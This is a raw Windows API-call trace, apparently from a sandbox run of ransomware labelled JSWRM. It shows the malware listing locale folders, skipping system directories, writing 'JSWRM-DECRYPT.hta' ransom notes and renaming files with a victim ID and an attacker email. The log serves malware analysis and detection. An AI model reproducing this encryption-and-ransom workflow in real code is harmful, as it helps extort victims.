[0067.729] lstrcmpiW (lpString1="da-DK", lpString2="$RECYCLE.BIN") returned 1 [0067.730] lstrcmpiW (lpString1="da-DK", lpString2="system volume information") returned -1 [0067.730] lstrcmpiW (lpString1="da-DK", lpString2="msocache") returned -1 [0067.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0067.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0067.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0067.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0067.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0067.730] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\jswrm-decrypt.hta")) returned 0xffffffff [0067.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0067.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0067.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0067.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0067.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0067.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0067.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0067.730] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0067.731] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.731] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0067.733] CloseHandle (hObject=0x454) returned 1 [0067.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0067.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0067.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0067.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0067.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0067.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0067.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0067.733] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\jswrm-decrypt.hta")) returned 0x20 [0067.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0067.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0067.733] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05550d5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f084cde, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231d00 [0067.734] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.734] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05550d5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f084cde, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.734] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.734] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.734] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f084cde, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f084cde, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f084cde, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0067.734] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0067.734] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0067.734] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0067.734] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0067.734] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0067.734] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0067.734] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0067.734] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0067.734] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0067.734] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0067.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0067.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241380, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0067.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0067.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0067.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0067.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0067.734] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2f0ba2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2f0ba2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2f0ba2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0067.734] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0067.735] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0067.735] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0067.735] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0067.735] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0067.735] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0067.735] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0067.735] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.735] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0067.735] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0067.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0067.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0067.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0067.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0067.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0067.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0067.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0067.735] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.736] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10088190985884976) returned 0 [0067.736] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.736] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.736] CloseHandle (hObject=0xffffffff) returned 1 [0067.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0067.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0067.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0067.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0067.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0067.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0067.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.736] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0067.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0067.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0067.737] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2f0ba2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2f0ba2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2f0ba2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0067.737] FindClose (in: hFindFile=0x231d00 | out: hFindFile=0x231d00) returned 1 [0067.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0067.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0067.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0067.737] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0555b2c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="de-DE", cAlternateFileName="")) returned 1 [0067.737] lstrcmpiW (lpString1="de-DE", lpString2=".") returned 1 [0067.737] lstrcmpiW (lpString1="de-DE", lpString2="..") returned 1 [0067.737] lstrcmpiW (lpString1="de-DE", lpString2="...") returned 1 [0067.737] lstrcmpiW (lpString1="de-DE", lpString2="windows") returned -1 [0067.737] lstrcmpiW (lpString1="de-DE", lpString2="recovery") returned -1 [0067.737] lstrcmpiW (lpString1="de-DE", lpString2="perflogs") returned -1 [0067.737] lstrcmpiW (lpString1="de-DE", lpString2="documents and settings") returned -1 [0067.737] lstrcmpiW (lpString1="de-DE", lpString2="$RECYCLE.BIN") returned 1 [0067.737] lstrcmpiW (lpString1="de-DE", lpString2="system volume information") returned -1 [0067.737] lstrcmpiW (lpString1="de-DE", lpString2="msocache") returned -1 [0067.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0067.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0067.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0067.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0067.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0067.737] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\jswrm-decrypt.hta")) returned 0xffffffff [0067.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0067.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0067.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0067.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0067.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0067.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0067.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0067.738] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0067.739] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.739] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0067.740] CloseHandle (hObject=0x454) returned 1 [0067.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0067.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0067.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0067.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0067.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0067.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0067.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0067.740] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\jswrm-decrypt.hta")) returned 0x20 [0067.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0067.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0067.741] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0555b2c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f084cde, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x232040 [0067.741] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.741] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0555b2c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f084cde, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.741] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.741] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.741] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f084cde, ftCreationTime.dwHighDateTime=0x1d53d3c, 